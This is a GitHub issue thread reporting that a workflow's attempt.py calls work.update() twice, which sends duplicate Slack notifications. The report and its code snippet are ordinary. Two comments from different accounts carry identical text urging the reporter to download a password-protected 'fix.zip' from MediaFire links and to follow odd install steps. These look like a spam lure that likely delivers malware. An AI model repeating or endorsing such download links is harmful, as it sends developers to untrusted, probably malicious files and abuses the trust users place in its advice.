### ISSUE TITLE
[BUG] `attempt.work` function triggering slack notification twice.

### ISSUE THREAD

**Issue by odarotto** [CHIMEFRB/workflow#111]
On `attempt.py`, we call `work.update()` function twice, on L104 and then on L115, this causes that if the Work object has a Notify setting, it will trigger the `slack.post_message()` function every time (see https://github.com/CHIMEFRB/buckets/blob/f40e8b53cec449bc507f28707ebc2009b9390e5e/buckets/backend/crud.py#L171).

```python
            archive.run(work, config)
            work.update()
            status = True
    except Exception as error:
        logger.error(error)
        if work:
            work.results = {"error": str(error)}
            work.products = None
            work.plots = None
            work.status = "failure"
    finally:
        if work:
            work.update()
            logger.info("work completed: ✅")
            unset_tag()
        return status
```

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
